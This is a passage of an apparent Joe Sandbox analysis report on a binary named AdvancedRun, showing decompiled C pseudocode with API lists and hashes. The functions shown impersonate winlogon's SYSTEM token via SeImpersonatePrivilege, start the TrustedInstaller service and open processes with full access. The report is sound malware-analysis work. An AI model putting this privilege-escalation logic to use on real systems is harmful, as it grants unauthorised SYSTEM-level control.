                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                  • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                  • String ID: %d %I64x
                                                                  • API String ID: 1126726007-2565891505
                                                                  • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                  • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                  • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                  • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 90%
                                                                  			E00401F04(void* __edx, intOrPtr _a4) {
                                                                  				int _v8;
                                                                  				void _v538;
                                                                  				long _v540;
                                                                  				void _v1066;
                                                                  				char _v1068;
                                                                  				long _t30;
                                                                  				int _t33;
                                                                  				int _t39;
                                                                  				void* _t42;
                                                                  				void* _t45;
                                                                  				long _t49;
                                                                  
                                                                  				_t45 = __edx;
                                                                  				_v540 = 0;
                                                                  				memset( &_v538, 0, 0x208);
                                                                  				_v1068 = 0;
                                                                  				memset( &_v1066, 0, 0x208);
                                                                  				E00404C3C( &_v540);
                                                                  				_t48 = L"winlogon.exe";
                                                                  				_t39 = wcslen(L"winlogon.exe");
                                                                  				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                  				_t53 = _t39 + _t8 - 0x104;
                                                                  				_pop(_t42);
                                                                  				if(_t39 + _t8 >= 0x104) {
                                                                  					_v1068 = 0;
                                                                  				} else {
                                                                  					E00404BE4( &_v1068,  &_v540, _t48);
                                                                  					_pop(_t42);
                                                                  				}
                                                                  				_v8 = 0;
                                                                  				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                  				_t49 = _t30;
                                                                  				_t54 = _t49;
                                                                  				if(_t49 == 0) {
                                                                  					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                  					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                  					if(_t33 == 0) {
                                                                  						_t49 = GetLastError();
                                                                  					}
                                                                  					CloseHandle(_v8);
                                                                  				}
                                                                  				return _t49;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00401F27
                                                                  • memset.MSVCRT ref: 00401F3F
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                  • wcslen.MSVCRT ref: 00401F5A
                                                                  • wcslen.MSVCRT ref: 00401F69
                                                                  • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                    • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                    • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                  • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                  • API String ID: 3867304300-2177360481
                                                                  • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                  • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                  • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                  • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 100%
                                                                  			E00401306(void* _a4) {
                                                                  				intOrPtr _v28;
                                                                  				struct _SERVICE_STATUS _v32;
                                                                  				void* _t5;
                                                                  				int _t12;
                                                                  				void* _t14;
                                                                  
                                                                  				_t12 = 0; // executed
                                                                  				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                  				_t14 = _t5;
                                                                  				if(_t14 != 0) {
                                                                  					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                  						_t12 = StartServiceW(_t14, 0, 0);
                                                                  					}
                                                                  					CloseServiceHandle(_t14);
                                                                  				}
                                                                  				CloseServiceHandle(_a4);
                                                                  				return _t12;
                                                                  			}

                                                                  APIs
                                                                  • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                  • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                  • String ID: TrustedInstaller
                                                                  • API String ID: 862991418-565535830
                                                                  • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                  • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                  • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                  • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 100%
                                                                  			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                  				int _t8;
                                                                  				struct HINSTANCE__* _t9;
                                                                  
                                                                  				if( *0x41c8e8 == 0) {
                                                                  					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                  					if(_t9 != 0) {
                                                                  						 *0x41c8e8 = 1;
                                                                  						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                  					}
                                                                  				}
                                                                  				if( *0x41c8ec == 0) {
                                                                  					return 0;
                                                                  				} else {
                                                                  					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                  					return _t8;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                  • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                  • API String ID: 1714573020-3385500049
                                                                  • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                  • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                  • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                  • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph (interactive graph; not reproduced)
                                                                  C-Code - Quality: 100%
                                                                  			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                  				struct HRSRC__* _t12;
                                                                  				void* _t16;
                                                                  				void* _t17;
                                                                  				signed int _t18;
                                                                  				signed int _t26;
                                                                  				signed int _t29;
                                                                  				signed int _t33;
                                                                  				struct HRSRC__* _t35;
                                                                  				signed int _t36;
                                                                  
                                                                  				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                  				_t35 = _t12;
                                                                  				if(_t35 != 0) {
                                                                  					_t33 = SizeofResource(_a4, _t35);
                                                                  					if(_t33 > 0) {
                                                                  						_t16 = LoadResource(_a4, _t35);
                                                                  						if(_t16 != 0) {
                                                                  							_t17 = LockResource(_t16);
                                                                  							if(_t17 != 0) {
                                                                  								_a4 = _t33;
                                                                  								_t29 = _t33 * _t33;
                                                                  								_t36 = 0;
                                                                  								_t7 =  &_a4;
                                                                  								 *_t7 = _a4 >> 2;
                                                                  								if( *_t7 != 0) {
                                                                  									do {
                                                                  										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                  										_t36 = _t36 + 1;
                                                                  										_t29 = _t26;
                                                                  									} while (_t36 < _a4);
                                                                  								}
                                                                  								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                  								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return 1;
                                                                  			}

                                                                  APIs
                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                  • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID:
                                                                  • API String ID: 3473537107-0
                                                                  • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                  • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                  • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                  • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph (interactive graph; not reproduced)
                                                                  C-Code - Quality: 100%
                                                                  			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                  				void* _t8;
                                                                  				void* _t13;
                                                                  				signed int _t16;
                                                                  				void** _t21;
                                                                  				signed int _t22;
                                                                  
                                                                  				_t21 = __edi;
                                                                  				_t22 =  *__eax;
                                                                  				if(__edx < _t22) {
                                                                  					return 0;
                                                                  				} else {
                                                                  					_t13 =  *__edi;
                                                                  					do {
                                                                  						_t1 =  &_a8; // 0x4057e1
                                                                  						 *__eax =  *__eax +  *_t1;
                                                                  						_t16 =  *__eax;
                                                                  					} while (__edx >= _t16);
                                                                  					_t8 = malloc(_t16 * _a4); // executed
                                                                  					 *__edi = _t8;
                                                                  					if(_t22 > 0) {
                                                                  						if(_t8 != 0) {
                                                                  							memcpy(_t8, _t13, _t22 * _a4);
                                                                  						}
                                                                  						free(_t13); // executed
                                                                  					}
                                                                  					return 0 |  *_t21 != 0x00000000;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • malloc.MSVCRT ref: 0040496D
                                                                  • memcpy.MSVCRT ref: 00404985
                                                                  • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                  Similarity
                                                                  • API ID: freemallocmemcpy
                                                                  • String ID: W@
                                                                  • API String ID: 3056473165-1729568415
                                                                  • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                  • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                  • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                  • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph (interactive graph; not reproduced)
                                                                  C-Code - Quality: 100%
                                                                  			E00405436(wchar_t* _a4) {
                                                                  				void _v2050;
                                                                  				signed short _v2052;
                                                                  				void* __esi;
                                                                  				struct HINSTANCE__* _t16;
                                                                  				WCHAR* _t18;
                                                                  
                                                                  				_v2052 = _v2052 & 0x00000000;
                                                                  				memset( &_v2050, 0, 0x7fe);
                                                                  				E00404C3C( &_v2052);
                                                                  				_t18 =  &_v2052;
                                                                  				E004047AF(_t18);
                                                                  				wcscat(_t18, _a4);
                                                                  				_t16 = LoadLibraryW(_t18); // executed
                                                                  				if(_t16 == 0) {
                                                                  					return LoadLibraryW(_a4);
                                                                  				}
                                                                  				return _t16;
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                    • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                    • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                  • wcscat.MSVCRT ref: 00405478
                                                                  • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                  • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  Similarity
                                                                  • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                  • String ID:
                                                                  • API String ID: 3725422290-0
                                                                  • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                  • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                  • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                  • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph (interactive graph; not reproduced)
                                                                  C-Code - Quality: 100%
                                                                  			E004054B9(intOrPtr* __esi) {
                                                                  
                                                                  				free( *(__esi + 0x10));
                                                                  				free( *(__esi + 0xc)); // executed
                                                                  				 *((intOrPtr*)(__esi)) = 0;
                                                                  				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                  				 *(__esi + 0xc) = 0;
                                                                  				 *(__esi + 0x10) = 0;
                                                                  				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                  				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                  				return 0;
                                                                  			}

                                                                  APIs
                                                                  • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                  • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                  • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                  • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                  • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
Uniqueness
• Uniqueness Score: -1.00%
                                                                  C-Code - Quality: 100%
                                                                  			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                  				signed int _v8;
                                                                  				void* _t8;
                                                                  				void* _t13;
                                                                  
                                                                  				_v8 = _v8 & 0x00000000;
                                                                  				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                  				_t13 = _t8;
                                                                  				if(_v8 != 0) {
                                                                  					FreeLibrary(_v8);
                                                                  				}
                                                                  				return _t13;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                    • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                  Similarity
                                                                  • API ID: CurrentErrorFreeLastLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 187924719-0
                                                                  • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                  • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                  • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                  • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 37%
                                                                  			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                  				void* __esi;
                                                                  				intOrPtr* _t6;
                                                                  				void* _t8;
                                                                  				struct HINSTANCE__** _t10;
                                                                  
                                                                  				_t10 = __eax;
                                                                  				E00409921(__eax);
                                                                  				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                  				if(_t6 == 0) {
                                                                  					return 0;
                                                                  				}
                                                                  				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                  				return _t8;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$FileModuleName
                                                                  • String ID:
                                                                  • API String ID: 3859505661-0
                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                  • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                  • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004095DA(signed int* __edi) {
                                                                  				void* __esi;
                                                                  				struct HINSTANCE__* _t3;
                                                                  				signed int* _t7;
                                                                  
                                                                  				_t7 = __edi;
                                                                  				_t3 =  *__edi;
                                                                  				if(_t3 != 0) {
                                                                  					FreeLibrary(_t3); // executed
                                                                  					 *__edi =  *__edi & 0x00000000;
                                                                  				}
                                                                  				E004099D4( &(_t7[0xa]));
                                                                  				return E004099D4( &(_t7[6]));
                                                                  			}

                                                                  APIs
                                                                  • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                  • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                  • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                  • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                  
                                                                  				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                  				return 1;
                                                                  			}

                                                                  APIs
                                                                  • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: EnumNamesResource
                                                                  • String ID:
                                                                  • API String ID: 3334572018-0
                                                                  • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                  • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                  • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                  • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004055D1(void* __eax, signed int* __esi) {
                                                                  				void* _t7;
                                                                  				signed int* _t9;
                                                                  
                                                                  				_t9 = __esi;
                                                                  				_t7 = __eax;
                                                                  				if(__esi[4] != 0) {
                                                                  					free(__esi[4]); // executed
                                                                  					__esi[4] = __esi[4] & 0x00000000;
                                                                  				}
                                                                  				_t9[2] = _t9[2] & 0x00000000;
                                                                  				 *_t9 =  *_t9 & 0x00000000;
                                                                  				return _t7;
                                                                  			}

                                                                  APIs
                                                                  • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                  • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                  • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                  • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  C-Code - Quality: 70%
                                                                  			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                  				char _v8;
                                                                  				long _v12;
                                                                  				long _v16;
                                                                  				long _v20;
                                                                  				intOrPtr _v24;
                                                                  				long _v28;
                                                                  				char _v564;
                                                                  				char _v16950;
                                                                  				char _v33336;
                                                                  				_Unknown_base(*)()* _v33348;
                                                                  				_Unknown_base(*)()* _v33352;
                                                                  				void _v33420;
                                                                  				void _v33432;
                                                                  				void _v33436;
                                                                  				intOrPtr _v66756;
                                                                  				intOrPtr _v66760;
                                                                  				void _v66848;
                                                                  				void _v66852;
                                                                  				void* __edi;
                                                                  				void* _t76;
                                                                  				_Unknown_base(*)()* _t84;
                                                                  				_Unknown_base(*)()* _t87;
                                                                  				void* _t90;
                                                                  				signed int _t126;
                                                                  				struct HINSTANCE__* _t128;
                                                                  				intOrPtr* _t138;
                                                                  				void* _t140;
                                                                  				void* _t144;
                                                                  				void* _t147;
                                                                  				void* _t148;
                                                                  
                                                                  				E0040B550(0x10524, __ecx);
                                                                  				_t138 = _a4;
                                                                  				_v12 = 0;
                                                                  				 *_t138 = 0;
                                                                  				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                  				_a8 = _t76;
                                                                  				if(_t76 == 0) {
                                                                  					 *_t138 = GetLastError();
                                                                  					L30:
                                                                  					return _v12;
                                                                  				}
                                                                  				_v33436 = 0;
                                                                  				memset( &_v33432, 0, 0x8284);
